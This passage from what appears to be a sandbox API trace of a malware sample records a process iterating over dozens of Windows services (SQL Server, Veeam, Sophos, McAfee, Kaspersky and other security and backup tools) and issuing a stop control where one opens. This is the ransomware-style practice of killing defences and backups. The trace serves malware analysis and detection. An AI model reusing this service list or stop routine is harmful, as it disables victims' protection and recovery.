dwDesiredAccess=0x2c) returned 0x0 [0059.789] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.790] GetTickCount () returned 0x11506e2 [0059.790] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.790] OpenServiceW (hSCManager=0xe4d060, lpServiceName="SQLAgent$SQL_2008", dwDesiredAccess=0x2c) returned 0x0 [0059.790] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.791] GetTickCount () returned 0x11506e2 [0059.791] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.791] OpenServiceW (hSCManager=0xe4d150, lpServiceName="SQLAgent$SYSTEM_BGC", dwDesiredAccess=0x2c) returned 0x0 [0059.791] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.791] GetTickCount () returned 0x11506e2 [0059.791] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.792] OpenServiceW (hSCManager=0xe4d240, lpServiceName="SQLAgent$TPS", dwDesiredAccess=0x2c) returned 0x0 [0059.792] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.792] GetTickCount () returned 0x11506e2 [0059.792] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d178 [0059.792] OpenServiceW (hSCManager=0xe4d178, lpServiceName="SQLAgent$TPSAMA", dwDesiredAccess=0x2c) returned 0x0 [0059.793] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.793] GetTickCount () returned 0x11506e2 [0059.793] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.793] OpenServiceW (hSCManager=0xe4d060, lpServiceName="SQLAgent$VEEAMSQL2008R2", dwDesiredAccess=0x2c) returned 0x0 [0059.793] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.794] GetTickCount () returned 0x11506e2 [0059.794] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.794] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="SQLAgent$VEEAMSQL2012", dwDesiredAccess=0x2c) returned 0x0 [0059.794] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.794] GetTickCount () returned 0x11506e2 [0059.794] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.795] OpenServiceW (hSCManager=0xe4d150, lpServiceName="SQLBrowser", dwDesiredAccess=0x2c) returned 0x0 [0059.795] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.795] GetTickCount () returned 0x11506e2 [0059.795] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.795] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="SQLSERVERAGENT", dwDesiredAccess=0x2c) returned 0x0 [0059.796] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.796] GetTickCount () returned 0x11506e2 [0059.796] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.796] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="SQLSafeOLRService", dwDesiredAccess=0x2c) returned 0x0 [0059.796] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.797] GetTickCount () returned 0x11506e2 [0059.797] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d330 [0059.797] OpenServiceW (hSCManager=0xe4d330, lpServiceName="SQLTELEMETRY", dwDesiredAccess=0x2c) returned 0x0 [0059.797] CloseServiceHandle (hSCObject=0xe4d330) returned 1 [0059.798] GetTickCount () returned 0x11506f2 [0059.798] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d330 [0059.798] OpenServiceW (hSCManager=0xe4d330, lpServiceName="SQLTELEMETRY$ECWDB2", dwDesiredAccess=0x2c) returned 0x0 [0059.798] CloseServiceHandle (hSCObject=0xe4d330) returned 1 [0059.798] GetTickCount () returned 0x11506f2 [0059.798] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d268 [0059.799] OpenServiceW (hSCManager=0xe4d268, lpServiceName="SQLWriter", dwDesiredAccess=0x2c) returned 0x0 [0059.799] CloseServiceHandle (hSCObject=0xe4d268) returned 1 [0059.799] GetTickCount () returned 0x11506f2 [0059.799] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d178 [0059.799] OpenServiceW (hSCManager=0xe4d178, lpServiceName="SQLsafe Backup Service", dwDesiredAccess=0x2c) returned 0x0 [0059.800] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.800] GetTickCount () returned 0x11506f2 [0059.800] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.800] OpenServiceW (hSCManager=0xe4d150, lpServiceName="SQLsafe Filter Service", dwDesiredAccess=0x2c) returned 0x0 [0059.800] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.801] GetTickCount () returned 0x11506f2 [0059.801] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.801] OpenServiceW (hSCManager=0xe4d060, lpServiceName="SamSs", dwDesiredAccess=0x2c) returned 0xe4d150 [0059.801] QueryServiceStatusEx (in: hService=0xe4d150, InfoLevel=0x0, lpBuffer=0x95fa94, cbBufSize=0x24, pcbBytesNeeded=0x95fac0 | out: lpBuffer=0x95fa94, pcbBytesNeeded=0x95fac0) returned 1 [0059.802] ControlService (in: hService=0xe4d150, dwControl=0x1, lpServiceStatus=0x95fa94 | out: lpServiceStatus=0x95fa94*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0059.805] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.805] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.805] GetTickCount () returned 0x11506f2 [0059.805] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.806] OpenServiceW (hSCManager=0xe4d240, lpServiceName="SepMasterService", dwDesiredAccess=0x2c) returned 0x0 [0059.806] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.806] GetTickCount () returned 0x11506f2 [0059.806] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.807] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="ShMonitor", dwDesiredAccess=0x2c) returned 0x0 [0059.807] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.807] GetTickCount () returned 0x11506f2 [0059.807] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.807] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="SmcService", dwDesiredAccess=0x2c) returned 0x0 [0059.808] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.808] GetTickCount () returned 0x11506f2 [0059.808] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.808] OpenServiceW (hSCManager=0xe4d150, lpServiceName="Smcinst", dwDesiredAccess=0x2c) returned 0x0 [0059.808] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.808] GetTickCount () returned 0x11506f2 [0059.808] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.809] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="SntpService", dwDesiredAccess=0x2c) returned 0x0 [0059.809] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.809] GetTickCount () returned 0x11506f2 [0059.809] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d2e0 [0059.810] OpenServiceW (hSCManager=0xe4d2e0, lpServiceName="Sophos Agent", dwDesiredAccess=0x2c) returned 0x0 [0059.810] CloseServiceHandle (hSCObject=0xe4d2e0) returned 1 [0059.810] GetTickCount () returned 0x11506f2 [0059.810] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d178 [0059.810] OpenServiceW (hSCManager=0xe4d178, lpServiceName="Sophos AutoUpdate Service", dwDesiredAccess=0x2c) returned 0x0 [0059.811] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.811] GetTickCount () returned 0x11506f2 [0059.811] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.811] OpenServiceW (hSCManager=0xe4d150, lpServiceName="Sophos Clean Service", dwDesiredAccess=0x2c) returned 0x0 [0059.811] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.811] GetTickCount () returned 0x11506f2 [0059.811] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.812] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="Sophos Device Control Service", dwDesiredAccess=0x2c) returned 0x0 [0059.812] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.812] GetTickCount () returned 0x11506f2 [0059.812] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d2e0 [0059.813] OpenServiceW (hSCManager=0xe4d2e0, lpServiceName="Sophos File Scanner Service", dwDesiredAccess=0x2c) returned 0x0 [0059.813] CloseServiceHandle (hSCObject=0xe4d2e0) returned 1 [0059.814] GetTickCount () returned 0x1150701 [0059.814] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.814] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="Sophos Health Service", dwDesiredAccess=0x2c) returned 0x0 [0059.814] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.814] GetTickCount () returned 0x1150701 [0059.814] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.815] OpenServiceW (hSCManager=0xe4d060, lpServiceName="Sophos MCS Agent", dwDesiredAccess=0x2c) returned 0x0 [0059.815] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.815] GetTickCount () returned 0x1150701 [0059.815] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.816] OpenServiceW (hSCManager=0xe4d150, lpServiceName="Sophos MCS Client", dwDesiredAccess=0x2c) returned 0x0 [0059.816] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.816] GetTickCount () returned 0x1150701 [0059.816] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d178 [0059.816] OpenServiceW (hSCManager=0xe4d178, lpServiceName="Sophos Message Router", dwDesiredAccess=0x2c) returned 0x0 [0059.816] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.817] GetTickCount () returned 0x1150701 [0059.817] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d330 [0059.817] OpenServiceW (hSCManager=0xe4d330, lpServiceName="Sophos Safestore Service", dwDesiredAccess=0x2c) returned 0x0 [0059.817] CloseServiceHandle (hSCObject=0xe4d330) returned 1 [0059.818] GetTickCount () returned 0x1150701 [0059.818] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.818] OpenServiceW (hSCManager=0xe4d150, lpServiceName="Sophos System Protection Service", dwDesiredAccess=0x2c) returned 0x0 [0059.818] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.819] GetTickCount () returned 0x1150701 [0059.819] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.819] OpenServiceW (hSCManager=0xe4d060, lpServiceName="Sophos Web Control Service", dwDesiredAccess=0x2c) returned 0x0 [0059.819] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.819] GetTickCount () returned 0x1150701 [0059.819] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.820] OpenServiceW (hSCManager=0xe4d240, lpServiceName="SstpSvc", dwDesiredAccess=0x2c) returned 0xe4d060 [0059.820] QueryServiceStatusEx (in: hService=0xe4d060, InfoLevel=0x0, lpBuffer=0x95fa94, cbBufSize=0x24, pcbBytesNeeded=0x95fac0 | out: lpBuffer=0x95fa94, pcbBytesNeeded=0x95fac0) returned 1 [0059.821] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.821] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.821] GetTickCount () returned 0x1150701 [0059.821] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d268 [0059.821] OpenServiceW (hSCManager=0xe4d268, lpServiceName="Symantec System Recovery", dwDesiredAccess=0x2c) returned 0x0 [0059.821] CloseServiceHandle (hSCObject=0xe4d268) returned 1 [0059.822] GetTickCount () returned 0x1150701 [0059.822] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.822] OpenServiceW (hSCManager=0xe4d150, lpServiceName="TmCCSF", dwDesiredAccess=0x2c) returned 0x0 [0059.822] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.822] GetTickCount () returned 0x1150701 [0059.822] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.823] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="TrueKey", dwDesiredAccess=0x2c) returned 0x0 [0059.823] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.823] GetTickCount () returned 0x1150701 [0059.823] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d178 [0059.824] OpenServiceW (hSCManager=0xe4d178, lpServiceName="TrueKeyScheduler", dwDesiredAccess=0x2c) returned 0x0 [0059.824] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.824] GetTickCount () returned 0x1150701 [0059.824] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.824] OpenServiceW (hSCManager=0xe4d240, lpServiceName="TrueKeyServiceHelper", dwDesiredAccess=0x2c) returned 0x0 [0059.824] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.825] GetTickCount () returned 0x1150701 [0059.825] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d2e0 [0059.825] OpenServiceW (hSCManager=0xe4d2e0, lpServiceName="UI0Detect", dwDesiredAccess=0x2c) returned 0xe4d240 [0059.825] QueryServiceStatusEx (in: hService=0xe4d240, InfoLevel=0x0, lpBuffer=0x95fa94, cbBufSize=0x24, pcbBytesNeeded=0x95fac0 | out: lpBuffer=0x95fa94, pcbBytesNeeded=0x95fac0) returned 1 [0059.826] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.826] CloseServiceHandle (hSCObject=0xe4d2e0) returned 1 [0059.826] GetTickCount () returned 0x1150701 [0059.826] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.826] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="Veeam Backup Catalog Data Service", dwDesiredAccess=0x2c) returned 0x0 [0059.826] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.827] GetTickCount () returned 0x1150701 [0059.827] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.827] OpenServiceW (hSCManager=0xe4d150, lpServiceName="VeeamBackupSvc", dwDesiredAccess=0x2c) returned 0x0 [0059.827] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.827] GetTickCount () returned 0x1150701 [0059.827] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.828] OpenServiceW (hSCManager=0xe4d240, lpServiceName="VeeamBrokerSvc", dwDesiredAccess=0x2c) returned 0x0 [0059.828] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.828] GetTickCount () returned 0x1150701 [0059.828] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.829] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="VeeamCatalogSvc", dwDesiredAccess=0x2c) returned 0x0 [0059.829] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.829] GetTickCount () returned 0x1150711 [0059.829] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.830] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="VeeamCloudSvc", dwDesiredAccess=0x2c) returned 0x0 [0059.830] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.830] GetTickCount () returned 0x1150711 [0059.830] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d178 [0059.830] OpenServiceW (hSCManager=0xe4d178, lpServiceName="VeeamDeploySvc", dwDesiredAccess=0x2c) returned 0x0 [0059.831] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.831] GetTickCount () returned 0x1150711 [0059.831] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d178 [0059.831] OpenServiceW (hSCManager=0xe4d178, lpServiceName="VeeamDeploymentService", dwDesiredAccess=0x2c) returned 0x0 [0059.831] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.831] GetTickCount () returned 0x1150711 [0059.832] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d330 [0059.832] OpenServiceW (hSCManager=0xe4d330, lpServiceName="VeeamEnterpriseManagerSvc", dwDesiredAccess=0x2c) returned 0x0 [0059.832] CloseServiceHandle (hSCObject=0xe4d330) returned 1 [0059.832] GetTickCount () returned 0x1150711 [0059.832] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.833] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="VeeamHvIntegrationSvc", dwDesiredAccess=0x2c) returned 0x0 [0059.833] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.833] GetTickCount () returned 0x1150711 [0059.833] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.833] OpenServiceW (hSCManager=0xe4d060, lpServiceName="VeeamMountSvc", dwDesiredAccess=0x2c) returned 0x0 [0059.833] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.834] GetTickCount () returned 0x1150711 [0059.834] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.834] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="VeeamNFSSvc", dwDesiredAccess=0x2c) returned 0x0 [0059.834] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.834] GetTickCount () returned 0x1150711 [0059.834] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.835] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="VeeamRESTSvc", dwDesiredAccess=0x2c) returned 0x0 [0059.835] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.835] GetTickCount () returned 0x1150711 [0059.835] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d2e0 [0059.835] OpenServiceW (hSCManager=0xe4d2e0, lpServiceName="VeeamTransportSvc", dwDesiredAccess=0x2c) returned 0x0 [0059.836] CloseServiceHandle (hSCObject=0xe4d2e0) returned 1 [0059.836] GetTickCount () returned 0x1150711 [0059.836] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.836] OpenServiceW (hSCManager=0xe4d150, lpServiceName="W3Svc", dwDesiredAccess=0x2c) returned 0x0 [0059.836] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.837] GetTickCount () returned 0x1150711 [0059.837] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.837] OpenServiceW (hSCManager=0xe4d150, lpServiceName="WRSVC", dwDesiredAccess=0x2c) returned 0x0 [0059.837] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.837] GetTickCount () returned 0x1150711 [0059.837] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.838] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="Zoolz 2 Service", dwDesiredAccess=0x2c) returned 0x0 [0059.838] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.838] GetTickCount () returned 0x1150711 [0059.838] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.838] OpenServiceW (hSCManager=0xe4d060, lpServiceName="bedbg", dwDesiredAccess=0x2c) returned 0x0 [0059.839] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.839] GetTickCount () returned 0x1150711 [0059.839] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.839] OpenServiceW (hSCManager=0xe4d060, lpServiceName="ekrn", dwDesiredAccess=0x2c) returned 0x0 [0059.839] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.840] GetTickCount () returned 0x1150711 [0059.840] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.840] OpenServiceW (hSCManager=0xe4d060, lpServiceName="kavfsslp", dwDesiredAccess=0x2c) returned 0x0 [0059.840] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.840] GetTickCount () returned 0x1150711 [0059.840] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.841] OpenServiceW (hSCManager=0xe4d240, lpServiceName="klnagent", dwDesiredAccess=0x2c) returned 0x0 [0059.841] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.841] GetTickCount () returned 0x1150711 [0059.841] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.841] OpenServiceW (hSCManager=0xe4d060, lpServiceName="macmnsvc", dwDesiredAccess=0x2c) returned 0x0 [0059.842] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.842] GetTickCount () returned 0x1150711 [0059.842] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.843] OpenServiceW (hSCManager=0xe4d150, lpServiceName="masvc", dwDesiredAccess=0x2c) returned 0x0 [0059.843] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.843] GetTickCount () returned 0x1150711 [0059.843] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d330 [0059.843] OpenServiceW (hSCManager=0xe4d330, lpServiceName="mfefire", dwDesiredAccess=0x2c) returned 0x0 [0059.844] CloseServiceHandle (hSCObject=0xe4d330) returned 1 [0059.844] GetTickCount () returned 0x1150711 [0059.844] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.845] OpenServiceW (hSCManager=0xe4d150, lpServiceName="mfemms", dwDesiredAccess=0x2c) returned 0x0 [0059.845] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.845] GetTickCount () returned 0x1150720 [0059.845] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d2e0 [0059.845] OpenServiceW (hSCManager=0xe4d2e0, lpServiceName="mfevtp", dwDesiredAccess=0x2c) returned 0x0 [0059.846] CloseServiceHandle (hSCObject=0xe4d2e0) returned 1 [0059.846] GetTickCount () returned 0x1150720 [0059.846] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.846] OpenServiceW (hSCManager=0xe4d150, lpServiceName="mozyprobackup", dwDesiredAccess=0x2c) returned 0x0 [0059.846] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.846] GetTickCount () returned 0x1150720 [0059.847] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d330 [0059.847] OpenServiceW (hSCManager=0xe4d330, lpServiceName="msftesql$PROD", dwDesiredAccess=0x2c) returned 0x0 [0059.847] CloseServiceHandle (hSCObject=0xe4d330) returned 1 [0059.847] GetTickCount () returned 0x1150720 [0059.847] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d2e0 [0059.848] OpenServiceW (hSCManager=0xe4d2e0, lpServiceName="ntrtscan", dwDesiredAccess=0x2c) returned 0x0 [0059.848] CloseServiceHandle (hSCObject=0xe4d2e0) returned 1 [0059.848] GetTickCount () returned 0x1150720 [0059.848] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.848] OpenServiceW (hSCManager=0xe4d150, lpServiceName="sacsvr", dwDesiredAccess=0x2c) returned 0x0 [0059.849] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.849] GetTickCount () returned 0x1150720 [0059.849] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d330 [0059.849] OpenServiceW (hSCManager=0xe4d330, lpServiceName="sophossps", dwDesiredAccess=0x2c) returned 0x0 [0059.849] CloseServiceHandle (hSCObject=0xe4d330) returned 1 [0059.849] GetTickCount () returned 0x1150720 [0059.849] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.850] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="svcGenericHost", dwDesiredAccess=0x2c) returned 0x0 [0059.850] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.850] GetTickCount () returned 0x1150720 [0059.850] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.851] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="swi_filter", dwDesiredAccess=0x2c) returned 0x0 [0059.851] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.851] GetTickCount () returned 0x1150720 [0059.851] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.851] OpenServiceW (hSCManager=0xe4d060, lpServiceName="swi_service", dwDesiredAccess=0x2c) returned 0x0 [0059.851] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.852] GetTickCount () returned 0x1150720 [0059.852] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.852] OpenServiceW (hSCManager=0xe4d150, lpServiceName="swi_update", dwDesiredAccess=0x2c) returned 0x0 [0059.852] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.852] GetTickCount () returned 0x1150720 [0059.852] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.853] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="swi_update_64", dwDesiredAccess=0x2c) returned 0x0 [0059.853] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.853] GetTickCount () returned 0x1150720 [0059.853] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d2e0 [0059.853] OpenServiceW (hSCManager=0xe4d2e0, lpServiceName="tmlisten", dwDesiredAccess=0x2c) returned 0x0 [0059.854] CloseServiceHandle (hSCObject=0xe4d2e0) returned 1 [0059.854] GetTickCount () returned 0x1150720 [0059.854] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 